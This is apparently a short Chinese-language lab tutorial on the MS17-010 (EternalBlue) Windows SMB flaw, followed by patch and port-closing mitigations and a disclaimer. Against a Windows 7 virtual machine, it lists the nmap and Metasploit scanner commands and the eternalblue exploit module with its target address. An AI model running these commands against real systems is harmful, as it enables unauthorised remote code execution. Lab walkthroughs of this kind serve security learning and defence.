MS17-010是在Microsoft Windows中的漏洞。 如果攻击者向目标主机服务器发送经特殊设计的消息,则可能会造成允许远程代码执行漏洞 ,编写此类文章的目的是为了介绍我们网络中的一些黑客攻击的方式和被攻击后的现象来让大家认识到网络攻击究竟是怎样的,以此来加强大家的识别能力从而保护自己虚拟财产的安全,学技术不是为了搞破坏,而是为了更好的去保护我们祖国的网络安全!
本实验在虚拟机环境下进行
kali 172.20.10.6
Windows 7 172.20.10.5
nmap 172.20.10.5
验证是否存在漏洞
- search ms17_010
- use auxiliary/scanner/smb/smb_ms17_010
- set RHOSTS 172.20.10.5
- run
复制代码
利用
- use exploit/windows/smb/ms17_010_eternalblue
- set RHOSTS 172.20.10.5
复制代码
修复建议
开启防火墙
关闭445、135、137、138、139端口,
关闭网络共享
微软官方补丁: https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010?redirectedfrom=MSDN
免责声明与本站提供的代码或者工具从事任何有关违法犯罪行为或活动的仅由您自己承担。滥用本网站上的信息可能会导致,有关人员提起刑事诉讼。如果对滥用本工具中的信息以从事违法犯罪行为,被追究责任的后果自负,作者将不承担任何责任。
编写此类文章的目的是为了介绍我们网络中的一些黑客攻击方法和被攻击后的现象来让大家认识到网络攻击究竟是怎样的,以此来加强大家的识别能力从而保护自己虚拟财产的安全,学技术不是为了搞破坏,而是为了更好的去保护我们祖国的网络安全!